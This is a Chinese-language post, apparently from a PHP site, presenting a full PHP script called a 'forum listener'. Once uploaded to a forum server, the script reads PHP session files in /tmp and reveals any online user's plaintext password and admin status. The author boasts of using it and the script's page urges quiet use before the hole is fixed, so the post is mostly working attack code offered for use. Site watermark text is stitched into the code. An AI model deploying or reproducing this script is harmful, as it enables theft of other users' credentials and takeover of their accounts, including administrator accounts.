之所以是能写出来这个函数，主要是对该网站的session结构清楚，如：name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1"，也知道该session存放的位置，而且可以上传文件，所以嘛，当时就做了一次小小的黑客，在线的朋友的密码可以一览无余，呵呵：

以下为引用的内容： <? function submit1(){ global $username; print "<title>论坛监听器</title>"; $i=0; if($username=="tasm"||$username=="Tasm") { print "你也太黑了吧？连我你也查？";   return; } $path="/tmp/"; $d = dir($path); while($entry=$d->read()){ php程序员站 if(substr($entry,0,4)=="sess"){ $entry=$path.$entry; $ary=@file($entry); if(!empty($ary[0])){ $ary = explode(";",$ary[0]); $name= explode(":",$ary[0]); if($name[2]=="\"".$username."\""){ $passwd= explode(":",$ary[1]); $mode=explode(":",$ary[3]); print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:"; if($mode[1]==1) print "<font color=red>管理员</font>"; else print "一般用户"; print"<br><br>偷窃他人密码是不道德行为请少少为之<br>"; $i=1; break; }}}} if(!$i) print "用户:".$username."真的在线吗？如你确定，<a href='javascript:history.go(-1)'>请再来一次</a>，不要多打空格！"; $d->close(); } function login(){ ?> <html> <head> www.phperz.com <title>论坛监听器</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head> <body bgcolor="#FFFFFF"> <div align="center"> <p>论坛监听器 </p> <p> </p> <table width="500" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="2">当你看到一用户在线时你想看他的密码，你要如何作呢？</td> </tr> <tr> <td colspan="2">让我来告诉你：就是使用本程序。</td> </tr> <tr> <td colspan="2"><font color=red>郑重申明:本程序为自由程序，由它所造成的任何损失本人盖不负责。</font> <br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td> </tr> </table> <form name="form1" method="post" action="<?print $PHP_SELF ?>" > www.phperz.com <p>请输入你要查的用户名：<br> <input type="text" name="username"> </p> <p> <input type="submit" name="submit1" value="我同意以上申明,开始查找"> </p> </form> <p> </p> </div> </body> </html> <? } //--------------main() if($submit1) submit1(); else login(); ?>

www.phperz.com